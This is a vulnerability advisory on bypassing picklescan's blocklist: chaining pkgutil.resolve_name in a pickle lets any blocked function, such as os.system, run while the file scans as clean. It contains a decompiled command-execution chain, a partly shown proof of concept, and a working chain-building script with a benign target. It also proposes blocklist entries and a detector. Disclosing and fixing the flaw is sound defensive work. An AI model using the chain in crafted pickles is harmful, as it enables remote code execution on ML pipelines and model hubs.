Security controls bypass or absence in picklescan

Description

picklescan: universal blocklist bypass via pkgutil.resolve_name

Summary

pkgutil.resolve_name() is a Python stdlib function that resolves any "module:attribute" string to the corresponding Python object at runtime. By using pkgutil.resolve_name as the first REDUCE call in a pickle, an attacker can obtain a reference to ANY blocked function (e.g., os.system, builtins.exec, subprocess.call) without that function appearing in the pickle's opcodes. picklescan only sees pkgutil.resolve_name (which is not blocked) and misses the actual dangerous function entirely.

This defeats picklescan's entire blocklist concept — every single entry in _unsafe_globals can be bypassed.

Severity

Critical (CVSS 10.0) — Universal bypass of all blocklist entries. Any blocked function can be invoked.

Affected Versions

    picklescan <= 1.0.3 (all versions including latest)

Details

How It Works

A pickle file uses two chained REDUCE calls:

1. STACK_GLOBAL: push pkgutil.resolve_name
2. REDUCE: call resolve_name("os:system") → returns os.system function object
3. REDUCE: call the returned function("malicious command") → RCE

picklescan's opcode scanner sees:

    STACK_GLOBAL with module=pkgutil, name=resolve_name → NOT in blocklist → CLEAN

    The second REDUCE operates on a stack value (the return of the first call), not on a global import → invisible to scanner

The string "os:system" is just data (a SHORT_BINUNICODE argument to the first REDUCE) — picklescan does not analyze REDUCE arguments, only GLOBAL/INST/STACK_GLOBAL references.
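The scanner's view can be illustrated with a benign stand-in. The sketch below is a simplified model and not picklescan's actual code: build_chain and imported_globals are hypothetical helpers, the resolved target is math:sqrt rather than a dangerous function, and the global extraction only approximates how an opcode scanner collects imports. It requires Python 3.9+, where pkgutil.resolve_name was added.

```python
import pickle
import pickletools
import struct


def sbu(s):
    """Encode a SHORT_BINUNICODE opcode (strings shorter than 256 bytes)."""
    b = s.encode()
    return b"\x8c" + struct.pack("<B", len(b)) + b


def build_chain(target, arg):
    """Hypothetical helper: pickle that evaluates resolve_name(target)(arg).

    `arg` must be an int in 0..255 because it is emitted as BININT1.
    """
    return (
        b"\x80\x04"                                      # PROTO 4
        + sbu("pkgutil") + sbu("resolve_name") + b"\x93"  # STACK_GLOBAL
        + sbu(target) + b"\x85" + b"R"                    # TUPLE1, REDUCE -> callable
        + b"K" + struct.pack("<B", arg) + b"\x85" + b"R"  # BININT1, TUPLE1, REDUCE
        + b"."                                            # STOP
    )


def imported_globals(data):
    """Simplified scanner model: collect (module, name) pairs from import opcodes.

    Assumption: STACK_GLOBAL operands are the two most recent string pushes
    (memo lookups are ignored), which is enough for this illustration.
    """
    strings, found = [], []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in ("SHORT_BINUNICODE", "BINUNICODE", "UNICODE"):
            strings.append(arg)
        elif opcode.name == "STACK_GLOBAL":
            found.append((strings[-2], strings[-1]))
        elif opcode.name in ("GLOBAL", "INST"):
            module, name = arg.split(" ", 1)
            found.append((module, name))
    return found


data = build_chain("math:sqrt", 16)
seen = imported_globals(data)   # [('pkgutil', 'resolve_name')]
result = pickle.loads(data)     # 4.0, i.e. math.sqrt(16)
print(seen, result)
```

The only import visible at the opcode level is pkgutil.resolve_name; math.sqrt never appears as a global even though it is the function that ends up being called.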

Decompiled Pickle (what the data actually does)

from pkgutil import resolve_name
_var0 = resolve_name('os:system')          # Returns the actual os.system function
_var1 = _var0('malicious_command')          # Calls os.system('malicious_command')
result = _var1

Confirmed Bypass Targets

Every entry in picklescan's blocklist can be reached via resolve_name:

Chain | Resolves To | Confirmed RCE | picklescan Result

Total: 11+ confirmed RCE chains, all reporting CLEAN.

Proof of Concept

import struct, io, pickle

def sbu(s):
    b = s.encode()
    return b"\x8c" + struct.pack("<B", len(b)) + b

# resolve_name("os:system")("id")
payload = (...

Why pkgutil Is Not Blocked

picklescan's _unsafe_globals (v1.0.3) does not include pkgutil. The module is a standard import utility — its primary purpose is module/package resolution. However, resolve_name() can resolve ANY attribute from ANY module, making it a universal gadget.
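A short illustration of why resolve_name acts as a universal gadget, using harmless targets only. This is a sketch assuming Python 3.9+ (the version that introduced pkgutil.resolve_name); the variable names are illustrative.

```python
import math
import os.path
from pkgutil import resolve_name

# "package.module:attribute" form: import the module, then walk the attributes.
sqrt_fn = resolve_name("math:sqrt")
join_fn = resolve_name("os.path:join")

# The colon is optional; a plain dotted name is resolved as well.
join_dotted = resolve_name("os.path.join")

print(sqrt_fn is math.sqrt)         # True
print(join_fn is os.path.join)      # True
print(join_dotted is os.path.join)  # True
```

The input is an ordinary string, so any importable attribute can be named without a corresponding import opcode appearing in the pickle.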

Note: fickling DOES block pkgutil in its UNSAFE_IMPORTS list.

Impact

This is a complete bypass of picklescan's security model. The entire blocklist (every module and function entry in _unsafe_globals) is rendered ineffective. An attacker only needs to use pkgutil.resolve_name as an indirection layer to call any Python function.

This affects:

    HuggingFace Hub (uses picklescan)

    Any ML pipeline using picklescan for safety validation

    Any system relying on picklescan's blocklist to prevent malicious pickle execution

Suggested Fix

    Immediate: Add pkgutil to _unsafe_globals:

    "pkgutil": {"resolve_name"},
    

    Also block similar resolution functions:

    "importlib": "*",
    "importlib.util": "*",
    

    Architectural: The blocklist approach cannot defend against indirect resolution gadgets. Even with pkgutil blocked, an attacker could find other stdlib functions that resolve module attributes. Consider:

      Analyzing REDUCE arguments for suspicious strings (e.g., patterns matching "module:function")

      Treating unknown globals as dangerous by default

      Switching to an allowlist model
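The architectural suggestions above can be sketched as follows. This is a minimal illustration under stated assumptions, not a proposed patch for picklescan: ALLOWED_GLOBALS, RESOLVABLE_NAME, suspicious_strings, AllowlistUnpickler, safe_loads and is_rejected are all hypothetical names, the allowlist contents are placeholders, and BENIGN_CHAIN is a harmless resolve_name("math:sqrt")(16) pickle used only for demonstration. The allowlist part follows the find_class override pattern described in the Python pickle documentation.

```python
import io
import pickle
import pickletools
import re

# Hypothetical allowlist: anything not listed here is treated as dangerous.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}

# Heuristic: strings shaped like "package.module:attr.subattr".
RESOLVABLE_NAME = re.compile(
    r"^[A-Za-z_]\w*(\.[A-Za-z_]\w*)*:[A-Za-z_]\w*(\.[A-Za-z_]\w*)*$"
)

# Benign demonstration pickle: resolve_name("math:sqrt")(16)
BENIGN_CHAIN = (
    b"\x80\x04\x8c\x07pkgutil\x8c\x0cresolve_name\x93"
    b"\x8c\x09math:sqrt\x85RK\x10\x85R."
)


def suspicious_strings(data):
    """Return string operands that look like 'module:attribute' references."""
    return [
        arg
        for _opcode, arg, _pos in pickletools.genops(data)
        if isinstance(arg, str) and RESOLVABLE_NAME.match(arg)
    ]


class AllowlistUnpickler(pickle.Unpickler):
    """Refuse every global that is not explicitly allowlisted."""

    def find_class(self, module, name):
        if (module, name) not in ALLOWED_GLOBALS:
            raise pickle.UnpicklingError(
                f"global {module}.{name} is not allowlisted"
            )
        return super().find_class(module, name)


def safe_loads(data):
    return AllowlistUnpickler(io.BytesIO(data)).load()


def is_rejected(data):
    """True if the allowlist unpickler refuses to load `data`."""
    try:
        safe_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


print(suspicious_strings(BENIGN_CHAIN))  # ['math:sqrt']
print(is_rejected(BENIGN_CHAIN))         # True: pkgutil.resolve_name not allowed
```

The string heuristic is easy to evade (resolve_name also accepts dotted names without a colon, and strings can be assembled at load time), so it is best viewed as a supplementary signal. The allowlist check is the stronger control because the gadget is rejected regardless of how its arguments are encoded.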
